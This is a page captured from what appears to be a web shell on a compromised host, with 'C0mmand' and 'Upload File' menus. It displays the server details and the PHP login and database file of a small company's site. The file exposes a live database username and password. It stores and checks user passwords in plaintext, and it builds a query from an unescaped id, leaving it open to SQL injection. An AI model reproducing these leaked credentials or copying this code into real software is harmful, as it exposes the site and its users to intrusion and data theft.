|
Server IP : 103.53.40.154 / Your IP : 18.118.140.78 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/fastelevator.in/admin/images/../vendor/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
session_start();
// connect to database
// $db = mysqli_connect('localhost', 'root', '', 'fast_elevator');
$db = mysqli_connect('localhost', 'ppcad7no_fastelevator', '?*,4zBBT,keW', 'ppcad7no_fastelevator');
// variable declaration
$username = "";
$email = "";
$errors = array();
if (isset($_POST['login_btn'])) {
login();
}
// LOGIN USER
function login(){
global $db, $username, $errors;
// grap form values
$username = e($_POST['username']);
$password = e($_POST['password']);
// make sure form is filled properly
if (empty($username)) {
array_push($errors, "Username is required");
}
if (empty($password)) {
array_push($errors, "Password is required");
}
// attempt login if no errors on form
if (count($errors) == 0) {
// $password = md5($password);
// Query for login_tbl
$query1 = "SELECT * FROM login_tbl WHERE username='$username' AND password='$password' LIMIT 1;";
$results1 = mysqli_query($db, $query1);
if (mysqli_num_rows($results1) == 1) { // user found in login_tbl
// check if user is admin or user
$logged_in_user = mysqli_fetch_assoc($results1);
if ($logged_in_user['user_type'] == 'supadmin') {
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location: index.php');
} else if ($logged_in_user['user_type'] == 'admin') {
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location: index.php');
} else if ($logged_in_user['user_type'] == 'user') {
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location: home.php');
} else {
$_SESSION['msg'] = "Invalid user type";
header('location: login.php');
}
} else {
$_SESSION['msg'] = "Invalid username or password";
header('location: login.php');
}
// Query for members
$query2 = "SELECT * FROM tbl_member WHERE username='$username' AND password='$password' LIMIT 1";
$results2 = mysqli_query($db, $query2);
if (mysqli_num_rows($results2) == 1) {
$logged_in_user = mysqli_fetch_assoc($results2);
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location:member_home.php');
}
// No user found in either table
array_push($errors, "Wrong username/password ");
}
}
function isAdmin()
{
if (isset($_SESSION['user']) && $_SESSION['user']['user_type'] == 'admin' ) {
return true;
}else{
return false;
}
}
// return user array from their id
function getUserById($id){
global $db;
$query = "SELECT * FROM login_tbl WHERE id= $id";
$result = mysqli_query($db, $query);
$user = mysqli_fetch_assoc($result);
return $user;
}
// escape string
function e($val){
global $db;
return mysqli_real_escape_string($db, trim($val));
}
function display_error() {
global $errors;
if (count($errors) > 0){
echo '<div class="error">';
foreach ($errors as $error){
echo $error .'<br>';
}
echo '</div>';
}
}
function isLoggedIn()
{
if (isset($_SESSION['user'])) {
return true;
}else{
return false;
}
}
if (isset($_GET['logout'])) {
session_destroy();
unset($_SESSION['user']);
header("location: login.php");
}
function db_query($query) {
global $db;
$result = mysqli_query($db, $query);
if ($result === false) {
die('Error executing query: ' . mysqli_error($db));
}
return $result;
}
?>